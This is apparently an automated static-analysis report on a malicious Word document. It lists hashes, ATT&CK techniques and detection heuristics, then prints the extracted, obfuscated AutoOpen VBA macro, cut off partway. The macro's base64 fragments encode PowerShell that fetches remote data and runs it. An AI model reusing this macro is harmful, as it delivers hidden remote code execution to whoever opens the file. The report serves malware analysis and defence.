Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4485082f8aa42759…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 267.5 KB
Created: 2018-03-08 21:46:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: 80a9ad619088f71af3aa690d92e9ba62
SHA-1: 7ebd82b8d09266bd19b1254b38cf1fbbac06a18e
SHA-256: 4485082f8aa42759e213506b74d8ab2f3b8ec6b81a8155496ffbadaec7a254bc
Risk Score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is a malicious Word document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, a critical indicator of malicious activity, suggesting it's designed to download and execute a secondary payload. The ClamAV detection further confirms its malicious nature.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6467497-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6467497-0
  • VBA macros detected [medium] (OLE_VBA_MACROS, 2 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5892 bytes
SHA-256: 9659df118ba9b65e14335f5ff77d53925af078e626a434a472b8d7873aaaaa43

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "upd"
' Auto-executes when the document is opened (OLE_VBA_AUTOOPEN).
' Obfuscation pattern: CT_OG is assembled one character at a time by indexing
' the IN_QE lookup array, while the many short Dim'd strings hold base64
' fragments that are concatenated into AT_RH for later decoding.
Sub AutoOpen()
    Dim CT_OG As String
    IN_QE = Array("e", "u", "-", "o", "w", "t", "s", "y", "d", " ", "x", "p", "r", "l", "n", "i", "b", "a", "c", "h")
    Dim BN_QJ As String
    BN_QJ = "ZgB1AG4AYwB0AGkA"
    CT_OG = CT_OG + IN_QE(11)
    CT_OG = CT_OG + IN_QE(3)
    Dim JP_RB As String
    JP_RB = "bwBuACAAYQAoACQAeAApAHsAcgBl"
    CT_OG = CT_OG + IN_QE(4)
    CT_OG = CT_OG + IN_QE(0)
    Dim FN_SJ As String
    FN_SJ = "AHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAA"
    CT_OG = CT_OG + IN_QE(12)
    CT_OG = CT_OG + IN_QE(6)
    Dim FQ_KI As String
    FQ_KI = "uAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4"
    CT_OG = CT_OG + IN_QE(19)
    CT_OG = CT_OG + IN_QE(0)
    Dim FR_KJ As String
    FR_KJ = "ARwBlAHQAUwB0AHIAaQBuAG"
    AT_RH = AT_RH & BN_QJ & JP_RB & FN_SJ & FQ_KI & FR_KJ
    CT_OG = CT_OG + IN_QE(13)
    CT_OG = CT_OG + IN_QE(13)
    Dim ET_NB As String
    ET_NB = "cAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdA"
    CT_OG = CT_OG + IN_QE(9)
    CT_OG = CT_OG + IN_QE(2)
    Dim FR_RD As String
    FR_RD = "DoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAb"
    CT_OG = CT_OG + IN_QE(4)
    CT_OG = CT_OG + IN_QE(15)
    Dim GT_SF As String
    GT_SF = "gBnACgAJAB4ACkAKQB9ADsAaQBlAHgAIAAkA"
    CT_OG = CT_OG + IN_QE(14)
    CT_OG = CT_OG + IN_QE(8)
    Dim EM_NH As String
    EM_NH = "CgAYQAgACQAKAAkACgAJAAo"
    CT_OG = CT_OG + IN_QE(3)
    CT_OG = CT_OG + IN_QE(4)
    Dim JM_RE As String
    JM_RE = "AGkAbgB2AG"
    AT_RH = AT_RH & ET_NB & FR_RD & GT_SF & EM_NH & JM_RE
    CT_OG = CT_OG + IN_QE(6)
    CT_OG = CT_OG + IN_QE(5)
    Dim CQ_KB As String
    CQ_KB = "8AawBlAC0AdwBlAGIAcgBlAHEAdQBlAHMAdA"
    CT_OG = CT_OG + IN_QE(7)
    CT_OG = CT_OG + IN_QE(13)
    Dim CL_SE As String
    CL_SE = "AgACcAaAB"
    CT_OG = CT_OG + IN_QE(0)
    CT_OG = CT_OG + IN_QE(9)
    Dim IL_SI As String
    IL_SI = "0AHQAcABzADoALwAvAHUAcwBwAHIAZAA1ADEANQAwAGMA"
    CT_OG = CT_OG + IN_QE(19)
    CT_OG = CT_OG + IN_QE(15)
    Dim BL_PG As String
    BL_PG = "ZQBuAHQAcgBhAGwALgB0AGEAYgBsAGUALgBjA"
    CT_OG = CT_OG + IN_QE(8)
    CT_OG = CT_OG + IN_QE(8)
    Dim IS_MH As String
    IS_MH = "G8AcgBlAC4AdwBpAG4AZABvAHcAcwAuAG4AZQB0AC8Adw"
    AT_RH = AT_RH & CQ_KB & CL_SE & IL_SI & BL_PG & IS_MH
    CT_OG = CT_OG + IN_QE(0)
    CT_OG = CT_OG + IN_QE(14)
    Dim ES_MF As String
    ES_MF = "BhAHIAZQBoAG8A"
    CT_OG = CT_OG + IN_QE(9)
    CT_OG = CT_OG + IN_QE(2)
    Dim HM_OC As String
    HM_OC = "dQBzAGUAPwAkAGYAaQBsAHQAZ"
    CT_OG = CT_OG + IN_QE(0)
    CT_OG = CT_OG + IN_QE(10)
    Dim FL_NB As String
    FL_NB = "QByAD0AUABhAHIAdABpAHQAaQBvAG4ASwBlAHkAJQAyADAA"
    CT_OG = CT_OG + IN_QE(0)
    CT_OG = CT_OG + IN_QE(18)
    Dim DR_MH As String
    DR_MH = "ZQBxACUAMgAwACUAMgA3AHMAdABh"
    CT_OG = CT_OG + IN_QE(1)
    CT_OG = CT_OG + IN_QE(5)
    Dim CM_OC As String
    CM_OC = "AGcAZQAlADIANwAmACQAUwBlAGwA"
    AT_RH = AT_RH & ES_MF & HM_OC & FL_NB & DR_MH & CM_OC
    CT_OG = CT_OG + IN_QE(15)
    CT_OG = CT_OG + IN_QE(3)
    Dim GP_RF As String
    GP_RF = "ZQBjAHQAPQBkAGEAdABhACYAcwB2AD0AMgAwA"
    CT_OG = CT_OG + IN_QE(14)
    CT_OG = CT_OG + IN_QE(11)
    Dim FM_PD As String
    FM_PD = "DEANwAtADAANAAtADEANwAmAHMAcwA9AGI"
    CT_OG = CT_OG + IN_QE(3)
    CT_OG = CT_OG + IN_QE(13)
    Dim HM_MH As String
    HM_MH = "AZgBxAHQAJgBzAHIAdAA9AHMAYwBvACYAcwBwAD0AcgB3AG"
    CT_OG = CT_OG + IN_QE(15)
    CT_OG = CT_OG + IN_QE(18)
    Dim FQ_SC As String
    FQ_SC = "QAbABhAGMA"
    CT_OG = CT_OG + IN_QE(7)
    CT_OG = CT_OG + IN_QE(9)
    Dim DO_PG As String
    DO_PG = "dQBwACYAcwBlAD0AMgAwADEAN"
    AT_RH = AT_RH & GP_RF & FM_PD & HM_MH & FQ_SC & DO_PG
    CT_OG = CT_OG + IN_QE(16)
    CT_OG = CT_OG + IN_QE(7)
... (truncated)